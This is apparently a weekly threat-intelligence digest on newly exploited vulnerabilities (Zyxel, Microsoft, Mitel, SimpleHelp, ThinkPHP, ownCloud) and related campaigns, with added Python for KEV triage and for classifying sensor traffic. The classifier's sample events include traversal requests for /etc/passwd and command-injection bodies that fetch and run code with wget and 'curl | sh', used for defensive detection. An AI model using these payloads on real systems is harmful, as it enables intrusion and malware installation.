Executive Summary
This week the CISA Known Exploited Vulnerabilities (KEV) catalog expanded with eight new additions: two Microsoft zero-days, two flaws in End-of-Life Zyxel DSL CPE devices, and one each affecting Trimble Cityworks, Apple iOS/iPadOS, SimpleHelp RMM, and Mitel SIP phones. Beyond these, GreyNoise detected a surge in exploitation activity targeting ThinkPHP and ownCloud vulnerabilities; the ownCloud flaw has been in the KEV catalog since November 2023, while the ThinkPHP flaw is not yet listed despite escalating real-world attacks.
Meanwhile, botnets continue to pose a significant threat, with EnemyBot and Sysrv-K exploiting weaknesses in Spring Cloud Gateway, while Mozi, Androxgh0st, Tsunami, Spytech Necro, and Sysrv intensify attacks on Atlassian products.
Additionally, Symantec uncovered an RA World ransomware attack leveraging a flaw in Palo Alto Networks PAN-OS, Microsoft detailed Seashell Blizzard’s BadPilot campaign targeting multiple vendors, and Recorded Future’s Insikt Group identified an active campaign exploiting unpatched Cisco network devices.
Trending / Critical Vulnerabilities
Current trending vulnerabilities offer insight into the latest emerging and widely discussed threats, helping defenders make informed prioritization decisions.
The Deserialization of Untrusted Data Vulnerability in Trimble Cityworks has been actively exploited, enabling attackers to execute code remotely on affected systems. With a high CVSS Score of 8.6, this flaw impacts Cityworks versions prior to 15.8.9 and Cityworks with Office Companion versions prior to 23.10. Though the technical exploitation details remain undisclosed, Trimble has identified WinPutty and Cobalt Strike beacons among the tools used by threat actors to gain persistence and control over compromised networks. Given its active exploitation, this vulnerability has been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, urging organizations to prioritize remediation.
A Link Following Vulnerability in Microsoft Windows Storage has been actively exploited as a zero-day, enabling attackers to gain elevated system privileges. With a high CVSS Score of 7.1, this vulnerability could enable adversaries to delete targeted files, potentially disrupting critical system operations. While the flaw does not directly expose sensitive information, it can impact system availability. Microsoft has released a security update to address this issue, and due to active exploitation it has been added to the CISA KEV catalog, underscoring the importance of timely patching.
A Heap-Based Buffer Overflow Vulnerability in the Microsoft Windows Ancillary Function Driver for WinSock (AFD.sys) has been exploited as a zero-day to elevate privileges. With a high CVSS Score of 7.8, this vulnerability affects AFD.sys, the kernel driver that backs the Windows Sockets API; successful exploitation yields SYSTEM privileges on the local machine. Microsoft has released a security update, but no details have been disclosed on how the vulnerability is being exploited in real-world attacks. Given its confirmed exploitation, it has been included in the CISA KEV catalog, urging organizations to apply the patch swiftly.
An Improper Authorization Vulnerability affecting Apple iPadOS and iOS has been discovered, leading Apple to issue an emergency security update to mitigate the risk. This flaw enables an attacker with physical access to disable USB Restricted Mode on a locked device, re-enabling data transfer over the USB connection and opening the door to further compromise. This vulnerability has been added to the CISA KEV catalog, urging users to update their devices promptly.
An OS Command Injection Vulnerability has been identified in the Zyxel DSL CPE series, with a high CVSS Score of 8.8. This post-authentication flaw allows an attacker with valid credentials to send a specially crafted HTTP POST request to the CGI program, enabling execution of arbitrary OS commands on the affected devices. Zyxel has confirmed that the affected models have reached End-of-Life and will not receive any patches or security updates, leaving them permanently vulnerable. Given its exploitation in the wild, this vulnerability has been added to the CISA KEV catalog, highlighting the need for immediate mitigation through device replacement.
A second OS Command Injection Vulnerability affects the same Zyxel DSL CPE series, also with a high CVSS Score of 8.8. This post-authentication vulnerability exists in the management commands component, enabling an authenticated attacker to execute arbitrary OS commands via Telnet. Zyxel has confirmed that the affected products have officially reached End-of-Life and will not receive patches or security updates, leaving them permanently vulnerable. GreyNoise has detected a significant overlap in IP activity between attackers exploiting this flaw and previously observed Mirai botnet operations, confirming that certain Mirai variants have integrated this exploit into their attack toolkit. Given its ongoing use in real-world attacks, it has been added to the CISA KEV catalog, highlighting the urgency of replacing vulnerable devices as soon as possible. Until a device can be replaced, the practical stopgap is to block WAN-side access to both management interfaces (the HTTP administration pages and Telnet) and to change any default administrator credentials, since both flaws require authentication.
A Command Injection Vulnerability affecting Mitel 6800, 6900, and 6900w series SIP phones, including the 6970 Conference Unit, could allow attackers to execute arbitrary commands within the phone's environment. The flaw originates from improper sanitization of user-supplied input, as demonstrated in a proof-of-concept (PoC) exploit released by Kyle Burns of PacketLabs in August 2024. According to Akamai's report, the first known exploitation attempts surfaced in January 2025, approximately six months after disclosure. The vulnerability is now under active exploitation, with attackers leveraging it to gain control over vulnerable devices. Due to this active exploitation, it has been added to the CISA KEV catalog, prompting organizations to take immediate mitigation measures.
An Unauthenticated Path Traversal Vulnerability in SimpleHelp Remote Monitoring and Management (RMM) software allows unauthenticated attackers to download arbitrary files from the SimpleHelp host using HTTP requests. These files may include server configuration files and hashed user passwords, increasing the risk of unauthorized access. With a high CVSS Score of 7.5, this vulnerability has been added to the CISA KEV catalog.
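The KEV additions above all carry the same operational demand: find the affected assets and fix them before the CISA due date. The following is an added example (not Loginsoft's, CISA's, or any vendor's code) of how that triage can be scripted. It reads a feed laid out with the field names of CISA's public KEV JSON (`cveID`, `vendorProject`, `product`, `dateAdded`, `dueDate`, `knownRansomwareCampaignUse`), joins it against a simple asset inventory, and ranks unpatched matches by due date. Every record, host name, and date in the sample is constructed for illustration and is not a real catalog entry.

```python
"""Triage a KEV-style feed against an asset inventory (added example)."""
import json
from datetime import date, datetime

# Constructed sample feed: field names mirror CISA's KEV JSON, but every
# entry below is fictional and chosen only to exercise the code paths.
SAMPLE_FEED = json.dumps({
    "title": "Constructed KEV-style sample",
    "vulnerabilities": [
        {"cveID": "CVE-2025-10001", "vendorProject": "ExampleVendor", "product": "DSL CPE",
         "vulnerabilityName": "ExampleVendor DSL CPE OS Command Injection",
         "dateAdded": "2025-02-11", "dueDate": "2025-03-04",
         "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2025-10002", "vendorProject": "ExampleVendor", "product": "RMM Server",
         "vulnerabilityName": "ExampleVendor RMM Server Path Traversal",
         "dateAdded": "2025-02-13", "dueDate": "2025-03-06",
         "knownRansomwareCampaignUse": "Known"},
        {"cveID": "CVE-2023-10003", "vendorProject": "OtherVendor", "product": "File Sync",
         "vulnerabilityName": "OtherVendor File Sync Information Disclosure",
         "dateAdded": "2023-11-30", "dueDate": "2023-12-21",
         "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2025-10004", "vendorProject": "Unrelated", "product": "Widget",
         "vulnerabilityName": "Unrelated Widget Bug",
         "dateAdded": "2025-02-12", "dueDate": "2025-03-05",
         "knownRansomwareCampaignUse": "Unknown"},
    ],
})

# Constructed inventory; the layout is an assumption made for this example.
SAMPLE_INVENTORY = [
    {"host": "edge-cpe-01", "vendor": "examplevendor", "product": "dsl cpe", "patched": False},
    {"host": "rmm-01", "vendor": "ExampleVendor", "product": "RMM Server", "patched": True},
    {"host": "files-01", "vendor": "OtherVendor", "product": "File Sync", "patched": False},
]


def parse_date(text):
    return datetime.strptime(text, "%Y-%m-%d").date()


def load_kev(raw):
    return json.loads(raw)["vulnerabilities"]


def added_between(entries, start, end):
    """Entries whose dateAdded falls in [start, end]; use it for a weekly digest."""
    return [e for e in entries if start <= parse_date(e["dateAdded"]) <= end]


def _key(vendor, product):
    # KEV vendor/product strings and inventory strings rarely agree on case
    # or whitespace, so normalise both sides before joining.
    return (vendor.strip().lower(), product.strip().lower())


def match_inventory(entries, inventory):
    """Pairs of (KEV entry, asset) for assets that are not yet patched."""
    by_key = {}
    for asset in inventory:
        by_key.setdefault(_key(asset["vendor"], asset["product"]), []).append(asset)
    hits = []
    for entry in entries:
        for asset in by_key.get(_key(entry["vendorProject"], entry["product"]), []):
            if not asset["patched"]:
                hits.append((entry, asset))
    return hits


def triage(raw, inventory, today):
    """Unpatched matches ranked: ransomware-linked first, then nearest due date."""
    rows = []
    for entry, asset in match_inventory(load_kev(raw), inventory):
        due = parse_date(entry["dueDate"])
        rows.append({
            "host": asset["host"],
            "cve": entry["cveID"],
            "days_until_due": (due - today).days,   # negative means overdue
            "overdue": due < today,
            "ransomware": entry["knownRansomwareCampaignUse"] == "Known",
        })
    rows.sort(key=lambda r: (not r["ransomware"], r["days_until_due"]))
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE_FEED, SAMPLE_INVENTORY, date(2025, 2, 14)):
        print(row)
```

The sort key puts entries with known ransomware use ahead of everything else and otherwise orders by days remaining, so an item that is already overdue (negative days) surfaces first. Swapping `SAMPLE_FEED` for the real catalog download and `SAMPLE_INVENTORY` for a CMDB export is the only change needed to run this against live data.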
A Sensitive Information Disclosure Vulnerability in ownCloud GraphAPI, added to the CISA Known Exploited Vulnerabilities (KEV) catalog in November 2023, continues to be actively targeted. GreyNoise recently detected 484 unique IPs attempting exploitation, with confirmed threat actor activity. To mitigate the risk, users should upgrade to ownCloud GraphAPI version 0.3.1 or later.
A Path Traversal Vulnerability in the ThinkPHP Framework could lead to arbitrary code execution, posing a critical security risk with a CVSS score of 9.8. GreyNoise has observed a surge in exploitation attempts, with 572 unique IPs actively targeting this flaw, and attack activity increasing in recent days. Past campaigns have shown Chinese threat actors exploiting ThinkPHP vulnerabilities, making this a high-risk issue. Upgrading to ThinkPHP version 6.0.14 or later is recommended to mitigate potential threats.
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As the source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities abused by Botnet
This section identifies vulnerabilities exploited by botnets, including recent CVEs logged in MISP. It presents the top 5 CVEs whose payloads are suggestive of botnet activity, such as using wget to fetch a binary from a bare IP address.
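The GreyNoise observations above (path traversal in ThinkPHP, the ownCloud GraphAPI information leak) and the botnet heuristic just described (wget or curl pulling a payload from a raw IP address) can all be checked with the same pass over sensor telemetry. The block below is an added example, not Loginsoft's, GreyNoise's, or Cytellite's code. The JSON-lines record layout (`src_ip`, `method`, `uri`, `body`) and every event in it are constructed for this illustration; the one real indicator used is the GetPhpInfo.php path published with the ownCloud GraphAPI disclosure, and the traversal and dropper checks are generic patterns rather than any specific vendor's signature.

```python
"""Tag HTTP sensor events for traversal, ownCloud phpinfo probes and botnet droppers
(added example)."""
import json
import re
from urllib.parse import unquote, unquote_plus

# Constructed sensor records; the JSON-lines layout is an assumption for this example.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"src_ip": "198.51.100.7", "method": "GET",
     "uri": "/index.php?lang=../../../../../../etc/passwd", "body": ""},
    {"src_ip": "198.51.100.7", "method": "GET",          # double URL-encoded traversal
     "uri": "/index.php?lang=..%252F..%252F..%252Fetc%252Fpasswd", "body": ""},
    {"src_ip": "203.0.113.9", "method": "GET",           # ownCloud GraphAPI phpinfo probe
     "uri": "/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php", "body": ""},
    {"src_ip": "192.0.2.44", "method": "POST", "uri": "/cgi-bin/admin.cgi",
     "body": "cmd=cd+/tmp;wget+http://192.0.2.200/bins/mips;chmod+%2Bx+mips;./mips"},
    {"src_ip": "192.0.2.45", "method": "POST", "uri": "/api/ping",
     "body": "host=127.0.0.1|curl+-s+http://updates.example.net/agent.sh|sh"},
    {"src_ip": "198.51.100.20", "method": "GET", "uri": "/index.php?lang=en", "body": ""},
])

TRAVERSAL = re.compile(r"\.\.[/\\]")
PHPINFO_PATH = "/apps/graphapi/vendor/microsoft/microsoft-graph/tests/getphpinfo.php"
# wget/curl followed (within the same shell command) by a URL whose host is a dotted-quad IP.
FETCH_FROM_IP = re.compile(
    r"\b(?:wget|curl)\b[^;|&\n]*?(https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?[^\s;|&'\"]*)",
    re.IGNORECASE)
# Same tool, any host: lower confidence, but still worth a look.
FETCH_ANY = re.compile(r"\b(?:wget|curl)\b[^;|&\n]*?(https?://[^\s;|&'\"]+)", re.IGNORECASE)


def decode(text):
    # First pass treats '+' as a form-encoded space; the second pass plain-decodes
    # so double-encoded sequences such as %252e%252e%2f surface as "../".
    return unquote(unquote_plus(text))


def classify(event):
    """Return the event's source plus the tags and dropper URLs found in it."""
    uri = decode(event.get("uri", ""))
    text = uri + "\n" + decode(event.get("body", ""))
    path = uri.split("?", 1)[0].lower()
    tags, urls = [], []
    if TRAVERSAL.search(text):
        tags.append("path_traversal")
    if path == PHPINFO_PATH:
        tags.append("owncloud_graphapi_phpinfo")
    ip_hits = FETCH_FROM_IP.findall(text)
    if ip_hits:
        tags.append("dropper_fetch_from_ip")
        urls.extend(ip_hits)
    else:
        any_hit = FETCH_ANY.search(text)
        if any_hit:
            tags.append("remote_fetch")
            urls.append(any_hit.group(1))
    return {"src_ip": event["src_ip"], "tags": tags, "urls": urls}


def triage(raw_jsonl):
    """Classify every record and keep only those that matched something."""
    results = [classify(json.loads(line)) for line in raw_jsonl.splitlines() if line.strip()]
    return [r for r in results if r["tags"]]


def by_source(results):
    """Collapse hits per source IP so one scanner shows up once with all its behaviours."""
    agg = {}
    for r in results:
        agg.setdefault(r["src_ip"], set()).update(r["tags"])
    return {ip: sorted(tags) for ip, tags in agg.items()}


if __name__ == "__main__":
    hits = triage(SAMPLE_EVENTS)
    for hit in hits:
        print(hit)
    print(by_source(hits))
```

Decoding twice is deliberate: scanners routinely double-encode `../` to slip past naive filters, and a detector that decodes once will miss them. The `dropper_fetch_from_ip` URLs are the values worth pivoting on, since the same staging host typically appears across many source IPs in a single botnet wave.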
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities that are targeted by adversaries. Each vulnerability is manually studied by an analyst and mapped to MITRE ATT&CK tactics and techniques. The information is drawn from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.
Symantec's Threat Hunter Team has uncovered an RA World ransomware attack from November 2024 targeting an unnamed Asian software and services company. Notably, the attacker deployed a malicious toolset previously linked to China-based cyber espionage groups, suggesting the possibility of an espionage operator moonlighting as a ransomware operator. While the exact initial access method remains unclear, the attacker claimed to have exploited a known vulnerability in Palo Alto Networks PAN-OS.
The BadPilot Campaign
Microsoft has published new research on a subgroup within the Russian state actor Seashell Blizzard, detailing its long-running BadPilot campaign. Active since at least 2021, this subgroup has systematically compromised Internet-facing infrastructure worldwide to establish persistence on high-value targets and enable tailored network operations. By exploiting known vulnerabilities in the network perimeters of both small office/home office and enterprise environments, the attackers have used stealthy persistence techniques to harvest credentials, execute commands, and move laterally, resulting in significant regional network compromises.
CVE-2023-20198 and CVE-2023-20273
Recorded Future's Insikt Group has identified a campaign between December 2024 and January 2025 that exploited unpatched, internet-facing Cisco network devices, primarily impacting global telecommunications providers. Victims included a U.S.-based affiliate of a U.K. telecommunications firm and a South African telecom provider. The activity has been attributed to the Chinese state-sponsored group "RedMike", which overlaps with the group Microsoft tracks as "Salt Typhoon". Both CVEs live in the IOS XE web UI, so beyond patching, devices that do not need the web UI should have the HTTP server feature disabled and the remainder should have management access restricted to trusted networks rather than exposed to the internet.
PRE-NVD observed for this week
This section covers vulnerabilities discovered, and potentially exploited, before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts, with plans to expand coverage.
External References
- https://www.cisa.gov/news-events/alerts/2025/02/12/cisa-adds-two-known-exploited-vulnerabilities-catalog
- https://www.cisa.gov/news-events/alerts/2025/02/11/cisa-adds-four-known-exploited-vulnerabilities-catalog
- https://www.cisa.gov/news-events/alerts/2025/02/07/cisa-adds-one-known-exploited-vulnerability-catalog
- https://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/
- https://support.apple.com/en-us/122174
- https://www.zerodayinitiative.com/blog/2025/2/11/the-february-2025-security-update-review
- https://www.security.com/threat-intelligence/chinese-espionage-ransomware
- https://www.recordedfuture.com/research/redmike-salt-typhoon-exploits-vulnerable-devices
- https://www.greynoise.io/blog/new-exploitation-surge-attackers-target-thinkphp-and-owncloud-flaws-at-scale
- https://www.cisa.gov/news-events/alerts/2025/02/13/cisa-adds-one-known-exploited-vulnerability-catalog